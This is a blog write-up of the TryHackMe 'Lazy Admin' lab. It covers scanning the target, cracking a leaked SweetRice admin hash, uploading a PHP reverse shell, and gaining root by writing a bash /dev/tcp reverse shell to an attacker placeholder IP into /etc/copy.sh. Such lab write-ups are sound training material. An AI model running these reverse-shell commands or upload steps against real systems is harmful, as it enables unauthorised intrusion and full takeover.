🎯
dmdhrumilmistry's gitbook
  • dmdhrumilmistry's gitbook
  • Blog
    • TryHackMe WriteUps
      • PickleRick
      • StartUp
      • Basic Malware RE
      • Bounty Hacker
      • Lazy Admin
      • Crack The Hash
      • Cyborg
      • OverPass
      • OverPass2
      • Agent T
      • Vulnerable API App
      • Git-Happens
      • Kiba
    • Vulnerabilities in Wild
      • Hiring Platform Exposing Thousands of User's Data
      • Security Analysis of the Indian Government's Student Assessment Platform
      • Exploiting S3 bucket misconfiguration to dump users emails
      • Getting Shell Access to ADB Exposed Smart Devices πŸ“²πŸ“ΊβŒš
      • Hacking Mumbai's Metro ChatBot and APIs for FUN πŸ€ΈπŸ»β€β™‚οΈ
      • Random Object Referencing IDs Still Aren't Safe in APIs πŸ’₯
      • Exploring Weird Account TakeOver (ATO) Vulnerabilities in APIs
    • Secure Software Development
      • Validating File Content Types to avoid Malicious File Hosting using ML Model
      • Securing Containers Supply Chain using Secure Base Layer Image
      • Automated API Tests in SDLC are Boon
Powered by GitBook
On this page
  • Target Details
  • Service Discovery
  • Finding Vulnerabilities
  • Exploitation
  • Privilege Escalation
  • Get Flags

Was this helpful?

  1. Blog
  2. TryHackMe WriteUps

Lazy Admin

PreviousBounty HackerNextCrack The Hash

Last updated 2 years ago

Was this helpful?

Covers:

  • Service Discovery

  • Finding Vulnerabilities

  • Exploitation

  • Privilege Escalation

Target Details

  • IP: 10.10.209.190

Service Discovery

  • Using nmap

    nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190

  • Services Discovered

    Service
    Port
    Version

    SSH

    22

    OpenSSH 7.2p2

    HTTP

    80

    Apache httpd 2.4.18

  • Finding Directories on HTTP server using GoBuster

    gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt

    Directories Discovered: /content

  • On visiting /content page, the server's using Basic CMS with Sweet Rice installed

Finding Vulnerabilities

  • username
    password hash
    password

    manager

    42f749ade7f9e195bf475f37a44cafcb

    Passwordxxx

    we don't know login page yet!

  • Moving to parent directory /content/inc/, we get access to all the files , from where we get Sweet Rice version /content/inc/lastest.txt which is 1.5.1

  • On reading the exploit, we get the admin page link as /as but admin page is different which is /content/as

  • Visit /content/as with the admin credentials above

  • We can add custom php code from ADS tab

  • TL;DR;

    Service
    Vulnerability

    Sweet Rice

    Sweet Rice 1.5.1

Exploitation

  • Create an evil reverse shell adversitement

  • Start listener using netcat

    nc -nlvp 1234

  • From content/inc/ads/ we can execute the uploaded reverse shell

  • We have access to the shell

    listening on [any] 1234 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

    We can run perl and /home/itguy/backup.pl as root

Privilege Escalation

  • Finding Escalation Vectors

    listening on [any] 1234 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

    We can run perl and /home/itguy/backup.pl as root

  • Victim's shell

    # overwrite contents of copy.sh with reverse shell on port
echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh

# on attacker's machine start netcat listener session on port 4444
# nc -nlvp 4444

# execute reverse shell with sudo rights
sudo /usr/bin/perl /home/itguy/backup.pl

  • Root Shell on Attacker's machine

    nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812
bash: cannot set terminal process group (1058): Inappropriate ioctl for device
bash: no job control in this shell
root@THM-Chal:/#

Get Flags

  • User Flag

    cat /home/itguy/user.txt
# THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}

  • Root Flag

    cat /root/root.txt
# THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}

From 1st vulnerability, after visting /content/inc/mysql_backup/ link we get SQL database file, from where we get username and password hash, which can be easily cracked online using various tools such as

On Searching for Sweet Rice 1.5.1 vulnerabilities on Search Engine, it leads to

Using PentestMonkey , we can get access to shell, by chaning ip variable to our attacker's vpn ip, and then upload

Room
crackstation
File Upload
php reverse shell template
Backup Disclosure
File Upload